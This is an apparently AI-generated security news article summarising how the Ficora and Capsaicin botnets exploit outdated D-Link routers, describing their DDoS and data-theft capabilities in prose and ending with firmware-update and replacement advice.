Ethical Hacking News
Malware botnets are becoming increasingly sophisticated, with recent attacks targeting outdated D-Link routers to gain access to sensitive information and execute malicious commands. In this article, we'll delve into the details of two such botnets, Ficora and Capsaicin, and explore how they exploit vulnerabilities in D-Link devices to carry out their nefarious activities.
Ficora and Capsaicin are two recent malware botnet variants targeting devices with outdated firmware or end-of-life versions. The Ficora botnet exploits D-Link device vulnerabilities, supporting UDP flooding, TCP flooding, DNS amplification, and stealing data. Capsaicin is believed to be developed by the Keksec group, using a downloader script and gathering host information for exfiltration. Defending against these botnets involves ensuring latest firmware versions, replacing end-of-life devices, or using open source firmware like OpenWRT.
Malware botnets have long been a concern for cybersecurity experts, with their ability to compromise large numbers of devices and execute malicious commands making them a formidable threat. In recent times, however, we've seen a rise in the sophistication of these botnets, with attackers leveraging vulnerabilities in outdated D-Link routers to gain access to sensitive information and carry out their nefarious activities.
According to Bill Toulas, a tech writer and infosec news reporter, two such botnets have been making headlines recently. Ficora and Capsaicin are the names of these malicious entities, and they're targeting devices running outdated firmware versions or those that have reached end-of-life. In this article, we'll take a closer look at how these botnets exploit vulnerabilities in D-Link devices to carry out their attacks.
Ficora, as the name suggests, is a variant of the Mirai botnet, adapted to exploit flaws in D-Link devices specifically. This new variant has shown random targeting, with notable surges in activity during October and November. Its payload includes a shell script named 'multi' that downloads and executes its payload through multiple methods such as wget, curl, ftpget, and tftp. The malware also features a built-in brute-force component with hard-coded credentials to infect additional Linux-based devices.
The Ficora botnet's DDoS capabilities are quite impressive, supporting UDP flooding, TCP flooding, and DNS amplification to maximize the power of its attacks. Its ability to steal data and execute shell scripts makes it a formidable force in the world of malware.
On the other hand, Capsaicin is believed to be malware developed by the Keksec group, known for 'EnemyBot' and other malware families targeting Linux devices. This botnet has been observed in a burst of attacks between October 21 and 22, primarily targeting East Asian countries. The infection occurs through a downloader script ("bins.sh"), which fetches binaries with the prefix 'yakuza' for different architectures, including arm, mips, sparc, and x86.
The Capsaicin botnet actively looks for other botnet payloads that are active on the same host and disables them. Apart from its DDoS capabilities, which mirror those of Ficora, Capsaicin can also gather host information and exfiltrate it to the command and control (C2) server for tracking.
Defending against these botnets requires some proactive steps. One way to prevent botnet malware infections on routers and IoT devices is to ensure that they're running the latest firmware version, which should address known vulnerabilities. If the device has reached end-of-life and no longer receives security updates, it's recommended to replace it with a new model.
Another alternative is to check if your device is supported by open source firmware such as OpenWRT. This can provide an added layer of security against botnet attacks.
In conclusion, Ficora and Capsaicin are just two examples of the sophisticated malware botnets that are becoming increasingly prevalent in today's digital landscape. By taking proactive steps to secure our devices and stay informed about emerging threats, we can mitigate the risks associated with these malicious entities.
Related Information:
https://www.bleepingcomputer.com/news/security/malware-botnets-exploit-outdated-d-link-routers-in-recent-attacks/
https://thehackernews.com/2024/12/ficora-and-kaiten-botnets-exploit-old-d.html
Published: Mon Dec 30 01:50:19 2024 by llama3.2 3B Q4_K_M
